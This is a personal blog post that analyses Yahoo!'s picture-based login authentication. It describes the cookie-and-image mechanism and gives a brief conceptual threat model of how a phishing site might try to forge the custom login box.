Picture authentication: threat modeling
In an article colourfully named The Two-Way Peephole, Forbes, a pro-Giuliani business magazine, describes advancements in Web security and new techniques that companies start to implement to reduce fraud. The article makes an interesting reading.
Here's the part that triggered some research on my side:
The new higher security levels now work in both directions, with you and your bank proving legitimacy to one another. Phishing, the spammer tactic of duping e-mail recipients into logging in to a phony site and then nabbing their personal info, has everyone confused. Phishers sent out a billion and a half e-mails last year, up 19% from 2005, according to Internet security firm Symantec. At Zions Bank, headquartered in Salt Lake City, and at Yahoo, for that matter, customers know they're safely logged in after they've seen a prearranged picture of, say, pansies or Labrador puppies.
I decided to go to Yahoo! and see how the picture is proving Yahoo's legitimacy to me. Here's the initial Yahoo! Mail logon box:
After clicking on Prevent Password Theft, you see the setup page (https://protect.login.yahoo.com/login/set_pref), where you choose the logon box colour, and either a text or a picture to diplay. This is my logon box after I made it orange and featuring foto of Albion Alley in Melbourne:
This is it. From now on, after logging on using my profile on this computer, I will receive this custom logon box. That is done using a permanent cookie. The cookie (associated with ) contains cryptic strings like:
When I request login page from login.yahoo.com, the cookie gets automatically sent to the server, which is using it to locate my picture on the Yahoo! file system. The URL of the Albion Alley image above is https://f5.yahoofs.com/login/9c2abb5871933a60408327cf235208b0/4451177319203bmhsibt31gjv8.gif?loB6HLGBed5FNv9F - it includes some kind of session ID, which is necessary to access the image. Like the login page (https://login.yahoo.com/), the image store is only available through SSL-encrypted connection.
What can go wrong? Can this login box be forged by a malicious site? Let's do some threat modeling. Below is the list of attacks and comments with regards to picture authentication:
- Traffic interception. Since SSL is required, a non-issue;
- Tampering with the network environment (traffic redirection, DNS poisoning, DNS spoofing and so on). The cookie will be sent to login.yahoo.com even though it's tampered with and is malicious. A purpose-built, server side HTML processor is required to extract the login box elements from the genuine site and place it on the malicious page, which is quite complicated but possible;
- Cross-site scripting (XSS) attack. Cookies are designed to be read only by the site that provides them, not by other sites. XSS gets around this restriction. Very dependent on the browser and the site design, the attack should also incorporate the HTML processor;
- Password-grabbing trojans. The picture doesn't protect from those;
- User negligence. The mother of all phishing attacks. It is required in the redirection attack (ignoring warnings about SSL or lack thereof). Some users will happily ignore the fact that the picture has changed or disappeared.
The picture is never shown to the client that doesn't have the cookie. To create the cookie, you need the picture. It takes compromising the client and stealing the cookie (or the picture) to misrepresent the server.
I was very sceptical about the idea of picture authentication by apparently Yahoo!'s implementation is raising the bar for man-in-the-middle attacks significantly. Way above the capabilities of an average stupid phisher. However it's not clear what percentage of the $13 billion fraud economy (according to Forbes and Javelin strategy and research - where do they get those numbers from?) is dependent on simplistic phishing and if technologies like PassMark that do almost same as Yahoo!'s (but worse) but cost their customers, financial institutions, $1 a customer a year, is everyone's guess. Either way, phishing is doomed.